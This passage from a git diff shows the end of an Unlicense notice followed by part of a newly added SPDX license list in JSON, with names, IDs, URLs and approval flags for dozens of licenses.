16THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
17EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
18MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
19IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
20OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
21ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
22OTHER DEALINGS IN THE SOFTWARE.
23
24For more information, please refer to <http://unlicense.org/>
diff --git a/meta/files/spdx-licenses.json b/meta/files/spdx-licenses.json
new file mode 100644
index 0000000000..ef926164ec
--- /dev/null
+++ b/meta/files/spdx-licenses.json
@@ -0,0 +1,5937 @@
1{
2 "licenseListVersion": "3.14",
3 "licenses": [
4 {
5 "reference": "https://spdx.org/licenses/GPL-1.0.html",
6 "isDeprecatedLicenseId": true,
7 "detailsUrl": "https://spdx.org/licenses/GPL-1.0.json",
8 "referenceNumber": 0,
9 "name": "GNU General Public License v1.0 only",
10 "licenseId": "GPL-1.0",
11 "seeAlso": [
12 "https://www.gnu.org/licenses/old-licenses/gpl-1.0-standalone.html"
13 ],
14 "isOsiApproved": false
15 },
16 {
17 "reference": "https://spdx.org/licenses/bzip2-1.0.6.html",
18 "isDeprecatedLicenseId": false,
19 "detailsUrl": "https://spdx.org/licenses/bzip2-1.0.6.json",
20 "referenceNumber": 1,
21 "name": "bzip2 and libbzip2 License v1.0.6",
22 "licenseId": "bzip2-1.0.6",
23 "seeAlso": [
24 "https://sourceware.org/git/?p\u003dbzip2.git;a\u003dblob;f\u003dLICENSE;hb\u003dbzip2-1.0.6",
25 "http://bzip.org/1.0.5/bzip2-manual-1.0.5.html"
26 ],
27 "isOsiApproved": false
28 },
29 {
30 "reference": "https://spdx.org/licenses/Intel-ACPI.html",
31 "isDeprecatedLicenseId": false,
32 "detailsUrl": "https://spdx.org/licenses/Intel-ACPI.json",
33 "referenceNumber": 2,
34 "name": "Intel ACPI Software License Agreement",
35 "licenseId": "Intel-ACPI",
36 "seeAlso": [
37 "https://fedoraproject.org/wiki/Licensing/Intel_ACPI_Software_License_Agreement"
38 ],
39 "isOsiApproved": false
40 },
41 {
42 "reference": "https://spdx.org/licenses/XSkat.html",
43 "isDeprecatedLicenseId": false,
44 "detailsUrl": "https://spdx.org/licenses/XSkat.json",
45 "referenceNumber": 3,
46 "name": "XSkat License",
47 "licenseId": "XSkat",
48 "seeAlso": [
49 "https://fedoraproject.org/wiki/Licensing/XSkat_License"
50 ],
51 "isOsiApproved": false
52 },
53 {
54 "reference": "https://spdx.org/licenses/CC-BY-NC-SA-2.0.html",
55 "isDeprecatedLicenseId": false,
56 "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-2.0.json",
57 "referenceNumber": 4,
58 "name": "Creative Commons Attribution Non Commercial Share Alike 2.0 Generic",
59 "licenseId": "CC-BY-NC-SA-2.0",
60 "seeAlso": [
61 "https://creativecommons.org/licenses/by-nc-sa/2.0/legalcode"
62 ],
63 "isOsiApproved": false
64 },
65 {
66 "reference": "https://spdx.org/licenses/Plexus.html",
67 "isDeprecatedLicenseId": false,
68 "detailsUrl": "https://spdx.org/licenses/Plexus.json",
69 "referenceNumber": 5,
70 "name": "Plexus Classworlds License",
71 "licenseId": "Plexus",
72 "seeAlso": [
73 "https://fedoraproject.org/wiki/Licensing/Plexus_Classworlds_License"
74 ],
75 "isOsiApproved": false
76 },
77 {
78 "reference": "https://spdx.org/licenses/Giftware.html",
79 "isDeprecatedLicenseId": false,
80 "detailsUrl": "https://spdx.org/licenses/Giftware.json",
81 "referenceNumber": 6,
82 "name": "Giftware License",
83 "licenseId": "Giftware",
84 "seeAlso": [
85 "http://liballeg.org/license.html#allegro-4-the-giftware-license"
86 ],
87 "isOsiApproved": false
88 },
89 {
90 "reference": "https://spdx.org/licenses/BitTorrent-1.0.html",
91 "isDeprecatedLicenseId": false,
92 "detailsUrl": "https://spdx.org/licenses/BitTorrent-1.0.json",
93 "referenceNumber": 7,
94 "name": "BitTorrent Open Source License v1.0",
95 "licenseId": "BitTorrent-1.0",
96 "seeAlso": [
97 "http://sources.gentoo.org/cgi-bin/viewvc.cgi/gentoo-x86/licenses/BitTorrent?r1\u003d1.1\u0026r2\u003d1.1.1.1\u0026diff_format\u003ds"
98 ],
99 "isOsiApproved": false
100 },
101 {
102 "reference": "https://spdx.org/licenses/APSL-1.1.html",
103 "isDeprecatedLicenseId": false,
104 "detailsUrl": "https://spdx.org/licenses/APSL-1.1.json",
105 "referenceNumber": 8,
106 "name": "Apple Public Source License 1.1",
107 "licenseId": "APSL-1.1",
108 "seeAlso": [
109 "http://www.opensource.apple.com/source/IOSerialFamily/IOSerialFamily-7/APPLE_LICENSE"
110 ],
111 "isOsiApproved": true
112 },
113 {
114 "reference": "https://spdx.org/licenses/GPL-2.0-with-GCC-exception.html",
115 "isDeprecatedLicenseId": true,
116 "detailsUrl": "https://spdx.org/licenses/GPL-2.0-with-GCC-exception.json",
117 "referenceNumber": 9,
118 "name": "GNU General Public License v2.0 w/GCC Runtime Library exception",
119 "licenseId": "GPL-2.0-with-GCC-exception",
120 "seeAlso": [
121 "https://gcc.gnu.org/git/?p\u003dgcc.git;a\u003dblob;f\u003dgcc/libgcc1.c;h\u003d762f5143fc6eed57b6797c82710f3538aa52b40b;hb\u003dcb143a3ce4fb417c68f5fa2691a1b1b1053dfba9#l10"
122 ],
123 "isOsiApproved": false
124 },
125 {
126 "reference": "https://spdx.org/licenses/UPL-1.0.html",
127 "isDeprecatedLicenseId": false,
128 "detailsUrl": "https://spdx.org/licenses/UPL-1.0.json",
129 "referenceNumber": 10,
130 "name": "Universal Permissive License v1.0",
131 "licenseId": "UPL-1.0",
132 "seeAlso": [
133 "https://opensource.org/licenses/UPL"
134 ],
135 "isOsiApproved": true,
136 "isFsfLibre": true
137 },
138 {
139 "reference": "https://spdx.org/licenses/wxWindows.html",
140 "isDeprecatedLicenseId": true,
141 "detailsUrl": "https://spdx.org/licenses/wxWindows.json",
142 "referenceNumber": 11,
143 "name": "wxWindows Library License",
144 "licenseId": "wxWindows",
145 "seeAlso": [
146 "https://opensource.org/licenses/WXwindows"
147 ],
148 "isOsiApproved": false
149 },
150 {
151 "reference": "https://spdx.org/licenses/Caldera.html",
152 "isDeprecatedLicenseId": false,
153 "detailsUrl": "https://spdx.org/licenses/Caldera.json",
154 "referenceNumber": 12,
155 "name": "Caldera License",
156 "licenseId": "Caldera",
157 "seeAlso": [
158 "http://www.lemis.com/grog/UNIX/ancient-source-all.pdf"
159 ],
160 "isOsiApproved": false
161 },
162 {
163 "reference": "https://spdx.org/licenses/Zend-2.0.html",
164 "isDeprecatedLicenseId": false,
165 "detailsUrl": "https://spdx.org/licenses/Zend-2.0.json",
166 "referenceNumber": 13,
167 "name": "Zend License v2.0",
168 "licenseId": "Zend-2.0",
169 "seeAlso": [
170 "https://web.archive.org/web/20130517195954/http://www.zend.com/license/2_00.txt"
171 ],
172 "isOsiApproved": false,
173 "isFsfLibre": true
174 },
175 {
176 "reference": "https://spdx.org/licenses/CUA-OPL-1.0.html",
177 "isDeprecatedLicenseId": false,
178 "detailsUrl": "https://spdx.org/licenses/CUA-OPL-1.0.json",
179 "referenceNumber": 14,
180 "name": "CUA Office Public License v1.0",
181 "licenseId": "CUA-OPL-1.0",
182 "seeAlso": [
183 "https://opensource.org/licenses/CUA-OPL-1.0"
184 ],
185 "isOsiApproved": true
186 },
187 {
188 "reference": "https://spdx.org/licenses/JPNIC.html",
189 "isDeprecatedLicenseId": false,
190 "detailsUrl": "https://spdx.org/licenses/JPNIC.json",
191 "referenceNumber": 15,
192 "name": "Japan Network Information Center License",
193 "licenseId": "JPNIC",
194 "seeAlso": [
195 "https://gitlab.isc.org/isc-projects/bind9/blob/master/COPYRIGHT#L366"
196 ],
197 "isOsiApproved": false
198 },
199 {
200 "reference": "https://spdx.org/licenses/SAX-PD.html",
201 "isDeprecatedLicenseId": false,
202 "detailsUrl": "https://spdx.org/licenses/SAX-PD.json",
203 "referenceNumber": 16,
204 "name": "Sax Public Domain Notice",
205 "licenseId": "SAX-PD",
206 "seeAlso": [
207 "http://www.saxproject.org/copying.html"
208 ],
209 "isOsiApproved": false
210 },
211 {
212 "reference": "https://spdx.org/licenses/CC-BY-ND-2.5.html",
213 "isDeprecatedLicenseId": false,
214 "detailsUrl": "https://spdx.org/licenses/CC-BY-ND-2.5.json",
215 "referenceNumber": 17,
216 "name": "Creative Commons Attribution No Derivatives 2.5 Generic",
217 "licenseId": "CC-BY-ND-2.5",
218 "seeAlso": [
219 "https://creativecommons.org/licenses/by-nd/2.5/legalcode"
220 ],
221 "isOsiApproved": false
222 },
223 {
224 "reference": "https://spdx.org/licenses/eGenix.html",
225 "isDeprecatedLicenseId": false,
226 "detailsUrl": "https://spdx.org/licenses/eGenix.json",
227 "referenceNumber": 18,
228 "name": "eGenix.com Public License 1.1.0",
229 "licenseId": "eGenix",
230 "seeAlso": [
231 "http://www.egenix.com/products/eGenix.com-Public-License-1.1.0.pdf",
232 "https://fedoraproject.org/wiki/Licensing/eGenix.com_Public_License_1.1.0"
233 ],
234 "isOsiApproved": false
235 },
236 {
237 "reference": "https://spdx.org/licenses/LGPLLR.html",
238 "isDeprecatedLicenseId": false,
239 "detailsUrl": "https://spdx.org/licenses/LGPLLR.json",
240 "referenceNumber": 19,
241 "name": "Lesser General Public License For Linguistic Resources",
242 "licenseId": "LGPLLR",
243 "seeAlso": [
244 "http://www-igm.univ-mlv.fr/~unitex/lgpllr.html"
245 ],
246 "isOsiApproved": false
247 },
248 {
249 "reference": "https://spdx.org/licenses/OLDAP-2.2.2.html",
250 "isDeprecatedLicenseId": false,
251 "detailsUrl": "https://spdx.org/licenses/OLDAP-2.2.2.json",
252 "referenceNumber": 20,
253 "name": "Open LDAP Public License 2.2.2",
254 "licenseId": "OLDAP-2.2.2",
255 "seeAlso": [
256 "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003ddf2cc1e21eb7c160695f5b7cffd6296c151ba188"
257 ],
258 "isOsiApproved": false
259 },
260 {
261 "reference": "https://spdx.org/licenses/CC-BY-ND-3.0-DE.html",
262 "isDeprecatedLicenseId": false,
263 "detailsUrl": "https://spdx.org/licenses/CC-BY-ND-3.0-DE.json",
264 "referenceNumber": 21,
265 "name": "Creative Commons Attribution No Derivatives 3.0 Germany",
266 "licenseId": "CC-BY-ND-3.0-DE",
267 "seeAlso": [
268 "https://creativecommons.org/licenses/by-nd/3.0/de/legalcode"
269 ],
270 "isOsiApproved": false
271 },
272 {
273 "reference": "https://spdx.org/licenses/IPA.html",
274 "isDeprecatedLicenseId": false,
275 "detailsUrl": "https://spdx.org/licenses/IPA.json",
276 "referenceNumber": 22,
277 "name": "IPA Font License",
278 "licenseId": "IPA",
279 "seeAlso": [
280 "https://opensource.org/licenses/IPA"
281 ],
282 "isOsiApproved": true,
283 "isFsfLibre": true
284 },
285 {
286 "reference": "https://spdx.org/licenses/NCSA.html",
287 "isDeprecatedLicenseId": false,
288 "detailsUrl": "https://spdx.org/licenses/NCSA.json",
289 "referenceNumber": 23,
290 "name": "University of Illinois/NCSA Open Source License",
291 "licenseId": "NCSA",
292 "seeAlso": [
293 "http://otm.illinois.edu/uiuc_openSource",
294 "https://opensource.org/licenses/NCSA"
295 ],
296 "isOsiApproved": true,
297 "isFsfLibre": true
298 },
299 {
300 "reference": "https://spdx.org/licenses/W3C.html",
301 "isDeprecatedLicenseId": false,
302 "detailsUrl": "https://spdx.org/licenses/W3C.json",
303 "referenceNumber": 24,
304 "name": "W3C Software Notice and License (2002-12-31)",
305 "licenseId": "W3C",
306 "seeAlso": [
307 "http://www.w3.org/Consortium/Legal/2002/copyright-software-20021231.html",
308 "https://opensource.org/licenses/W3C"
309 ],
310 "isOsiApproved": true,
311 "isFsfLibre": true
312 },
313 {
314 "reference": "https://spdx.org/licenses/Adobe-2006.html",
315 "isDeprecatedLicenseId": false,
316 "detailsUrl": "https://spdx.org/licenses/Adobe-2006.json",
317 "referenceNumber": 25,
318 "name": "Adobe Systems Incorporated Source Code License Agreement",
319 "licenseId": "Adobe-2006",
320 "seeAlso": [
321 "https://fedoraproject.org/wiki/Licensing/AdobeLicense"
322 ],
323 "isOsiApproved": false
324 },
325 {
326 "reference": "https://spdx.org/licenses/Net-SNMP.html",
327 "isDeprecatedLicenseId": false,
328 "detailsUrl": "https://spdx.org/licenses/Net-SNMP.json",
329 "referenceNumber": 26,
330 "name": "Net-SNMP License",
331 "licenseId": "Net-SNMP",
332 "seeAlso": [
333 "http://net-snmp.sourceforge.net/about/license.html"
334 ],
335 "isOsiApproved": false
336 },
337 {
338 "reference": "https://spdx.org/licenses/CC-BY-SA-4.0.html",
339 "isDeprecatedLicenseId": false,
340 "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-4.0.json",
341 "referenceNumber": 27,
342 "name": "Creative Commons Attribution Share Alike 4.0 International",
343 "licenseId": "CC-BY-SA-4.0",
344 "seeAlso": [
345 "https://creativecommons.org/licenses/by-sa/4.0/legalcode"
346 ],
347 "isOsiApproved": false,
348 "isFsfLibre": true
349 },
350 {
351 "reference": "https://spdx.org/licenses/YPL-1.0.html",
352 "isDeprecatedLicenseId": false,
353 "detailsUrl": "https://spdx.org/licenses/YPL-1.0.json",
354 "referenceNumber": 28,
355 "name": "Yahoo! Public License v1.0",
356 "licenseId": "YPL-1.0",
357 "seeAlso": [
358 "http://www.zimbra.com/license/yahoo_public_license_1.0.html"
359 ],
360 "isOsiApproved": false
361 },
362 {
363 "reference": "https://spdx.org/licenses/Nunit.html",
364 "isDeprecatedLicenseId": true,
365 "detailsUrl": "https://spdx.org/licenses/Nunit.json",
366 "referenceNumber": 29,
367 "name": "Nunit License",
368 "licenseId": "Nunit",
369 "seeAlso": [
370 "https://fedoraproject.org/wiki/Licensing/Nunit"
371 ],
372 "isOsiApproved": false
373 },
374 {
375 "reference": "https://spdx.org/licenses/MITNFA.html",
376 "isDeprecatedLicenseId": false,
377 "detailsUrl": "https://spdx.org/licenses/MITNFA.json",
378 "referenceNumber": 30,
379 "name": "MIT +no-false-attribs license",
380 "licenseId": "MITNFA",
381 "seeAlso": [
382 "https://fedoraproject.org/wiki/Licensing/MITNFA"
383 ],
384 "isOsiApproved": false
385 },
386 {
387 "reference": "https://spdx.org/licenses/PHP-3.01.html",
388 "isDeprecatedLicenseId": false,
389 "detailsUrl": "https://spdx.org/licenses/PHP-3.01.json",
390 "referenceNumber": 31,
391 "name": "PHP License v3.01",
392 "licenseId": "PHP-3.01",
393 "seeAlso": [
394 "http://www.php.net/license/3_01.txt"
395 ],
396 "isOsiApproved": true,
397 "isFsfLibre": true
398 },
399 {
400 "reference": "https://spdx.org/licenses/BSD-Source-Code.html",
401 "isDeprecatedLicenseId": false,
402 "detailsUrl": "https://spdx.org/licenses/BSD-Source-Code.json",
403 "referenceNumber": 32,
404 "name": "BSD Source Code Attribution",
405 "licenseId": "BSD-Source-Code",
406 "seeAlso": [
407 "https://github.com/robbiehanson/CocoaHTTPServer/blob/master/LICENSE.txt"
408 ],
409 "isOsiApproved": false
410 },
411 {
412 "reference": "https://spdx.org/licenses/CC-BY-SA-2.5.html",
413 "isDeprecatedLicenseId": false,
414 "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-2.5.json",
415 "referenceNumber": 33,
416 "name": "Creative Commons Attribution Share Alike 2.5 Generic",
417 "licenseId": "CC-BY-SA-2.5",
418 "seeAlso": [
419 "https://creativecommons.org/licenses/by-sa/2.5/legalcode"
420 ],
421 "isOsiApproved": false
422 },
423 {
424 "reference": "https://spdx.org/licenses/Motosoto.html",
425 "isDeprecatedLicenseId": false,
426 "detailsUrl": "https://spdx.org/licenses/Motosoto.json",
427 "referenceNumber": 34,
428 "name": "Motosoto License",
429 "licenseId": "Motosoto",
430 "seeAlso": [
431 "https://opensource.org/licenses/Motosoto"
432 ],
433 "isOsiApproved": true
434 },
435 {
436 "reference": "https://spdx.org/licenses/OSL-1.1.html",
437 "isDeprecatedLicenseId": false,
438 "detailsUrl": "https://spdx.org/licenses/OSL-1.1.json",
439 "referenceNumber": 35,
440 "name": "Open Software License 1.1",
441 "licenseId": "OSL-1.1",
442 "seeAlso": [
443 "https://fedoraproject.org/wiki/Licensing/OSL1.1"
444 ],
445 "isOsiApproved": false,
446 "isFsfLibre": true
447 },
448 {
449 "reference": "https://spdx.org/licenses/NGPL.html",
450 "isDeprecatedLicenseId": false,
451 "detailsUrl": "https://spdx.org/licenses/NGPL.json",
452 "referenceNumber": 36,
453 "name": "Nethack General Public License",
454 "licenseId": "NGPL",
455 "seeAlso": [
456 "https://opensource.org/licenses/NGPL"
457 ],
458 "isOsiApproved": true
459 },
460 {
461 "reference": "https://spdx.org/licenses/CC-BY-2.5-AU.html",
462 "isDeprecatedLicenseId": false,
463 "detailsUrl": "https://spdx.org/licenses/CC-BY-2.5-AU.json",
464 "referenceNumber": 37,
465 "name": "Creative Commons Attribution 2.5 Australia",
466 "licenseId": "CC-BY-2.5-AU",
467 "seeAlso": [
468 "https://creativecommons.org/licenses/by/2.5/au/legalcode"
469 ],
470 "isOsiApproved": false
471 },
472 {
473 "reference": "https://spdx.org/licenses/Unicode-TOU.html",
474 "isDeprecatedLicenseId": false,
475 "detailsUrl": "https://spdx.org/licenses/Unicode-TOU.json",
476 "referenceNumber": 38,
477 "name": "Unicode Terms of Use",
478 "licenseId": "Unicode-TOU",
479 "seeAlso": [
480 "http://www.unicode.org/copyright.html"
481 ],
482 "isOsiApproved": false
483 },
484 {
485 "reference": "https://spdx.org/licenses/BSD-3-Clause-No-Nuclear-License.html",
486 "isDeprecatedLicenseId": false,
487 "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-No-Nuclear-License.json",
488 "referenceNumber": 39,
489 "name": "BSD 3-Clause No Nuclear License",
490 "licenseId": "BSD-3-Clause-No-Nuclear-License",
491 "seeAlso": [
492 "http://download.oracle.com/otn-pub/java/licenses/bsd.txt?AuthParam\u003d1467140197_43d516ce1776bd08a58235a7785be1cc"
493 ],
494 "isOsiApproved": false
495 },
496 {
497 "reference": "https://spdx.org/licenses/OPUBL-1.0.html",
498 "isDeprecatedLicenseId": false,
499 "detailsUrl": "https://spdx.org/licenses/OPUBL-1.0.json",
500 "referenceNumber": 40,
501 "name": "Open Publication License v1.0",
502 "licenseId": "OPUBL-1.0",
503 "seeAlso": [
504 "http://opencontent.org/openpub/",
505 "https://www.debian.org/opl",
506 "https://www.ctan.org/license/opl"
507 ],
508 "isOsiApproved": false
509 },
510 {
511 "reference": "https://spdx.org/licenses/CC-BY-NC-SA-2.0-UK.html",
512 "isDeprecatedLicenseId": false,
513 "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-2.0-UK.json",
514 "referenceNumber": 41,
515 "name": "Creative Commons Attribution Non Commercial Share Alike 2.0 England and Wales",
516 "licenseId": "CC-BY-NC-SA-2.0-UK",
517 "seeAlso": [
518 "https://creativecommons.org/licenses/by-nc-sa/2.0/uk/legalcode"
519 ],
520 "isOsiApproved": false
521 },
522 {
523 "reference": "https://spdx.org/licenses/NLOD-2.0.html",
524 "isDeprecatedLicenseId": false,
525 "detailsUrl": "https://spdx.org/licenses/NLOD-2.0.json",
526 "referenceNumber": 42,
527 "name": "Norwegian Licence for Open Government Data (NLOD) 2.0",
528 "licenseId": "NLOD-2.0",
529 "seeAlso": [
530 "http://data.norge.no/nlod/en/2.0"
531 ],
532 "isOsiApproved": false
533 },
534 {
535 "reference": "https://spdx.org/licenses/gnuplot.html",
536 "isDeprecatedLicenseId": false,
537 "detailsUrl": "https://spdx.org/licenses/gnuplot.json",
538 "referenceNumber": 43,
539 "name": "gnuplot License",
540 "licenseId": "gnuplot",
541 "seeAlso": [
542 "https://fedoraproject.org/wiki/Licensing/Gnuplot"
543 ],
544 "isOsiApproved": false,
545 "isFsfLibre": true
546 },
547 {
548 "reference": "https://spdx.org/licenses/EPICS.html",
549 "isDeprecatedLicenseId": false,
550 "detailsUrl": "https://spdx.org/licenses/EPICS.json",
551 "referenceNumber": 44,
552 "name": "EPICS Open License",
553 "licenseId": "EPICS",
554 "seeAlso": [
555 "https://epics.anl.gov/license/open.php"
556 ],
557 "isOsiApproved": false
558 },
559 {
560 "reference": "https://spdx.org/licenses/Info-ZIP.html",
561 "isDeprecatedLicenseId": false,
562 "detailsUrl": "https://spdx.org/licenses/Info-ZIP.json",
563 "referenceNumber": 45,
564 "name": "Info-ZIP License",
565 "licenseId": "Info-ZIP",
566 "seeAlso": [
567 "http://www.info-zip.org/license.html"
568 ],
569 "isOsiApproved": false
570 },
571 {
572 "reference": "https://spdx.org/licenses/OLDAP-2.0.html",
573 "isDeprecatedLicenseId": false,
574 "detailsUrl": "https://spdx.org/licenses/OLDAP-2.0.json",
575 "referenceNumber": 46,
576 "name": "Open LDAP Public License v2.0 (or possibly 2.0A and 2.0B)",
577 "licenseId": "OLDAP-2.0",
578 "seeAlso": [
579 "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003dcbf50f4e1185a21abd4c0a54d3f4341fe28f36ea"
580 ],
581 "isOsiApproved": false
582 },
583 {
584 "reference": "https://spdx.org/licenses/CERN-OHL-P-2.0.html",
585 "isDeprecatedLicenseId": false,
586 "detailsUrl": "https://spdx.org/licenses/CERN-OHL-P-2.0.json",
587 "referenceNumber": 47,
588 "name": "CERN Open Hardware Licence Version 2 - Permissive",
589 "licenseId": "CERN-OHL-P-2.0",
590 "seeAlso": [
591 "https://www.ohwr.org/project/cernohl/wikis/Documents/CERN-OHL-version-2"
592 ],
593 "isOsiApproved": true
594 },
595 {
596 "reference": "https://spdx.org/licenses/BSD-3-Clause-No-Nuclear-Warranty.html",
597 "isDeprecatedLicenseId": false,
598 "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-No-Nuclear-Warranty.json",
599 "referenceNumber": 48,
600 "name": "BSD 3-Clause No Nuclear Warranty",
601 "licenseId": "BSD-3-Clause-No-Nuclear-Warranty",
602 "seeAlso": [
603 "https://jogamp.org/git/?p\u003dgluegen.git;a\u003dblob_plain;f\u003dLICENSE.txt"
604 ],
605 "isOsiApproved": false
606 },
607 {
608 "reference": "https://spdx.org/licenses/AML.html",
609 "isDeprecatedLicenseId": false,
610 "detailsUrl": "https://spdx.org/licenses/AML.json",
611 "referenceNumber": 49,
612 "name": "Apple MIT License",
613 "licenseId": "AML",
614 "seeAlso": [
615 "https://fedoraproject.org/wiki/Licensing/Apple_MIT_License"
616 ],
617 "isOsiApproved": false
618 },
619 {
620 "reference": "https://spdx.org/licenses/MulanPSL-1.0.html",
621 "isDeprecatedLicenseId": false,
622 "detailsUrl": "https://spdx.org/licenses/MulanPSL-1.0.json",
623 "referenceNumber": 50,
624 "name": "Mulan Permissive Software License, Version 1",
625 "licenseId": "MulanPSL-1.0",
626 "seeAlso": [
627 "https://license.coscl.org.cn/MulanPSL/",
628 "https://github.com/yuwenlong/longphp/blob/25dfb70cc2a466dc4bb55ba30901cbce08d164b5/LICENSE"
629 ],
630 "isOsiApproved": false
631 },
632 {
633 "reference": "https://spdx.org/licenses/Multics.html",
634 "isDeprecatedLicenseId": false,
635 "detailsUrl": "https://spdx.org/licenses/Multics.json",
636 "referenceNumber": 51,
637 "name": "Multics License",
638 "licenseId": "Multics",
639 "seeAlso": [
640 "https://opensource.org/licenses/Multics"
641 ],
642 "isOsiApproved": true
643 },
644 {
645 "reference": "https://spdx.org/licenses/VSL-1.0.html",
646 "isDeprecatedLicenseId": false,
647 "detailsUrl": "https://spdx.org/licenses/VSL-1.0.json",
648 "referenceNumber": 52,
649 "name": "Vovida Software License v1.0",
650 "licenseId": "VSL-1.0",
651 "seeAlso": [
652 "https://opensource.org/licenses/VSL-1.0"
653 ],
654 "isOsiApproved": true
655 },
656 {
657 "reference": "https://spdx.org/licenses/RSA-MD.html",
658 "isDeprecatedLicenseId": false,
659 "detailsUrl": "https://spdx.org/licenses/RSA-MD.json",
660 "referenceNumber": 53,
661 "name": "RSA Message-Digest License",
662 "licenseId": "RSA-MD",
663 "seeAlso": [
664 "http://www.faqs.org/rfcs/rfc1321.html"
665 ],
666 "isOsiApproved": false
667 },
668 {
669 "reference": "https://spdx.org/licenses/CC-PDDC.html",
670 "isDeprecatedLicenseId": false,
671 "detailsUrl": "https://spdx.org/licenses/CC-PDDC.json",
672 "referenceNumber": 54,
673 "name": "Creative Commons Public Domain Dedication and Certification",
674 "licenseId": "CC-PDDC",
675 "seeAlso": [
676 "https://creativecommons.org/licenses/publicdomain/"
677 ],
678 "isOsiApproved": false
679 },
680 {
681 "reference": "https://spdx.org/licenses/CC-BY-SA-2.1-JP.html",
682 "isDeprecatedLicenseId": false,
683 "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-2.1-JP.json",
684 "referenceNumber": 55,
685 "name": "Creative Commons Attribution Share Alike 2.1 Japan",
686 "licenseId": "CC-BY-SA-2.1-JP",
687 "seeAlso": [
688 "https://creativecommons.org/licenses/by-sa/2.1/jp/legalcode"
689 ],
690 "isOsiApproved": false
691 },
692 {
693 "reference": "https://spdx.org/licenses/LPPL-1.2.html",
694 "isDeprecatedLicenseId": false,
695 "detailsUrl": "https://spdx.org/licenses/LPPL-1.2.json",
696 "referenceNumber": 56,
697 "name": "LaTeX Project Public License v1.2",
698 "licenseId": "LPPL-1.2",
699 "seeAlso": [
700 "http://www.latex-project.org/lppl/lppl-1-2.txt"
701 ],
702 "isOsiApproved": false,
703 "isFsfLibre": true
704 },
705 {
706 "reference": "https://spdx.org/licenses/Spencer-94.html",
707 "isDeprecatedLicenseId": false,
708 "detailsUrl": "https://spdx.org/licenses/Spencer-94.json",
709 "referenceNumber": 57,
710 "name": "Spencer License 94",
711 "licenseId": "Spencer-94",
712 "seeAlso": [
713 "https://fedoraproject.org/wiki/Licensing/Henry_Spencer_Reg-Ex_Library_License"
714 ],
715 "isOsiApproved": false
716 },
717 {
718 "reference": "https://spdx.org/licenses/OLDAP-1.2.html",
719 "isDeprecatedLicenseId": false,
720 "detailsUrl": "https://spdx.org/licenses/OLDAP-1.2.json",
721 "referenceNumber": 58,
722 "name": "Open LDAP Public License v1.2",
723 "licenseId": "OLDAP-1.2",
724 "seeAlso": [
725 "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003d42b0383c50c299977b5893ee695cf4e486fb0dc7"
726 ],
727 "isOsiApproved": false
728 },
729 {
730 "reference": "https://spdx.org/licenses/O-UDA-1.0.html",
731 "isDeprecatedLicenseId": false,
732 "detailsUrl": "https://spdx.org/licenses/O-UDA-1.0.json",
733 "referenceNumber": 59,
734 "name": "Open Use of Data Agreement v1.0",
735 "licenseId": "O-UDA-1.0",
736 "seeAlso": [
737 "https://github.com/microsoft/Open-Use-of-Data-Agreement/blob/v1.0/O-UDA-1.0.md",
738 "https://cdla.dev/open-use-of-data-agreement-v1-0/"
739 ],
740 "isOsiApproved": false
741 },
742 {
743 "reference": "https://spdx.org/licenses/OLDAP-2.7.html",
744 "isDeprecatedLicenseId": false,
745 "detailsUrl": "https://spdx.org/licenses/OLDAP-2.7.json",
746 "referenceNumber": 60,
747 "name": "Open LDAP Public License v2.7",
748 "licenseId": "OLDAP-2.7",
749 "seeAlso": [
750 "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003d47c2415c1df81556eeb39be6cad458ef87c534a2"
751 ],
752 "isOsiApproved": false,
753 "isFsfLibre": true
754 },
755 {
756 "reference": "https://spdx.org/licenses/Glulxe.html",
757 "isDeprecatedLicenseId": false,
758 "detailsUrl": "https://spdx.org/licenses/Glulxe.json",
759 "referenceNumber": 61,
760 "name": "Glulxe License",
761 "licenseId": "Glulxe",
762 "seeAlso": [
763 "https://fedoraproject.org/wiki/Licensing/Glulxe"
764 ],
765 "isOsiApproved": false
766 },
767 {
768 "reference": "https://spdx.org/licenses/iMatix.html",
769 "isDeprecatedLicenseId": false,
770 "detailsUrl": "https://spdx.org/licenses/iMatix.json",
771 "referenceNumber": 62,
772 "name": "iMatix Standard Function Library Agreement",
773 "licenseId": "iMatix",
774 "seeAlso": [
775 "http://legacy.imatix.com/html/sfl/sfl4.htm#license"
776 ],
777 "isOsiApproved": false,
778 "isFsfLibre": true
779 },
780 {
781 "reference": "https://spdx.org/licenses/TAPR-OHL-1.0.html",
782 "isDeprecatedLicenseId": false,
783 "detailsUrl": "https://spdx.org/licenses/TAPR-OHL-1.0.json",
784 "referenceNumber": 63,
785 "name": "TAPR Open Hardware License v1.0",
786 "licenseId": "TAPR-OHL-1.0",
787 "seeAlso": [
788 "https://www.tapr.org/OHL"
789 ],
790 "isOsiApproved": false
791 },
792 {
793 "reference": "https://spdx.org/licenses/NBPL-1.0.html",
794 "isDeprecatedLicenseId": false,
795 "detailsUrl": "https://spdx.org/licenses/NBPL-1.0.json",
796 "referenceNumber": 64,
797 "name": "Net Boolean Public License v1",
798 "licenseId": "NBPL-1.0",
799 "seeAlso": [
800 "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003d37b4b3f6cc4bf34e1d3dec61e69914b9819d8894"
801 ],
802 "isOsiApproved": false
803 },
804 {
805 "reference": "https://spdx.org/licenses/LiLiQ-R-1.1.html",
806 "isDeprecatedLicenseId": false,
